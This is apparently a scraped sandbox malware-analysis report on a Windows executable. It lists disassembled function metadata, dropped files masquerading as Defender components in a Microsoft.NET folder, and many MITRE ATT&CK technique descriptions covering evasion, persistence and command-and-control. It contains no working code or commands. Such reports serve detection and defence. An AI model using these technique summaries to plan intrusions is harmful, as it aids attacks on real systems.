Part of subcall function 004839A0: WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?), ref: 00483A49
Part of subcall function 004839A0: Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00483AD1
Part of subcall function 004839A0: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00483AEE

Strings

%3d-%s, xrefs: 00483BF4
%s, xrefs: 00483BC3
%3d %s, xrefs: 00483C12

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: Warning$CloseErrorHandleLastObjectSingleWait
String ID: %s$%3d %s$%3d-%s
API String ID: 3663929458-2392319129
Opcode ID: d65305bbf87d5230ce43d25c4ee2adbe4c1cdbc7b714267ab57c207de21e5383
Instruction ID: eb6683cb543313287dca9b8e250a624c20775ef733adbd037cb8cbdd00075591
Opcode Fuzzy Hash: d65305bbf87d5230ce43d25c4ee2adbe4c1cdbc7b714267ab57c207de21e5383
Instruction Fuzzy Hash: 7B1187B19001089FDB10EF64CD42FAE33A8EB44704F5005AAFE0997292DA399A55CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00481040 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00481077
Warning.VMWAREBASE(?), ref: 0048107E

Part of subcall function 00483B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00483B96

Strings

Invalid arguments to '%s%s', xrefs: 004810A0

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: Warning$free
String ID: Invalid arguments to '%s%s'
API String ID: 2642810717-2166776113
Opcode ID: 664a12c1daa8cf62a2cc1b6fbe62215ba4b3ed5228c36d75c614bb54c709013e
Instruction ID: 2e360601dddaddfd7ea6010496e321e0ea61a4e9e4baf53ca2dd2d89874b10ca
Opcode Fuzzy Hash: 664a12c1daa8cf62a2cc1b6fbe62215ba4b3ed5228c36d75c614bb54c709013e
Instruction Fuzzy Hash: 3EF07D36600200A7D7107F65EC11FAD776DDB8AB18F04047FFB054B652C26A665187A8

Uniqueness

Uniqueness Score: -1.00%

Function 00482700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

Warning.VMWAREBASE(?,00001000,?,00486E9C,?,00486E9C,RevertToSelf failed: %d,00000000), ref: 0048273F

Part of subcall function 004827C0: GetLastError.KERNEL32(?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 004827D8
Part of subcall function 004827C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 004827F3
Part of subcall function 004827C0: Warning.VMWAREBASE(?,0048A850,?,?,00001000,?,00000005,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00482807
Part of subcall function 004827C0: _printf.MSPDB140-MSVCRT ref: 00482824
Part of subcall function 004827C0: SetLastError.KERNEL32(00000000,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 0048282D

Part of subcall function 004839A0: Warning.VMWAREBASE(?,00000406,?,?,?), ref: 004839D9
Part of subcall function 004839A0: Warning.VMWAREBASE(00000000,?,?,?,?,?,?), ref: 00483A21
Part of subcall function 004839A0: WSAGetLastError.WS2_32(?,?,?,?,?,?), ref: 00483A2B
Part of subcall function 004839A0: WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?), ref: 00483A49
Part of subcall function 004839A0: Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00483AD1
Part of subcall function 004839A0: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00483AEE

Part of subcall function 00483DD0: ExitThread.KERNEL32 ref: 00483DF3

Strings

599 vmware-authd PANIC: %s, xrefs: 0048275E
PANIC: %s, xrefs: 0048274B

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: Warning$ErrorLast$CloseExitHandleObjectSingleThreadWait_printf
String ID: 599 vmware-authd PANIC: %s$PANIC: %s
API String ID: 333243209-1572072357
Opcode ID: 36e605545191d6b26e9a2e52c3b547970d61da17236320d4fb4581667eb6af10
Instruction ID: fde8bea5c4248737055474812d1465c03cf7df45a241b8c918727aeeb918231f
Opcode Fuzzy Hash: 36e605545191d6b26e9a2e52c3b547970d61da17236320d4fb4581667eb6af10
Instruction Fuzzy Hash: 76F06875500148AED711FB51CC56FAC739CDB08B95F44049AB9484B152D6A869C44769

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0923840932020004-3-0.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll

C:\Program Files (x86)\Microsoft.NET\AmMonitoringInstall.mof

C:\Program Files (x86)\Microsoft.NET\AmStatusInstall.mof

C:\Program Files (x86)\Microsoft.NET\ClientWMIInstall.mof

C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe

C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll

C:\Program Files (x86)\Microsoft.NET\EppManifest.dll

C:\Program Files (x86)\Microsoft.NET\FepUnregister.mof

C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll

C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll

C:\Program Files (x86)\Microsoft.NET\MpClient.dll

C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dll

C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe

C:\Program Files (x86)\Microsoft.NET\MpCommu.dll

Windows Analysis Report
0923840932020004-3-0.exe

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre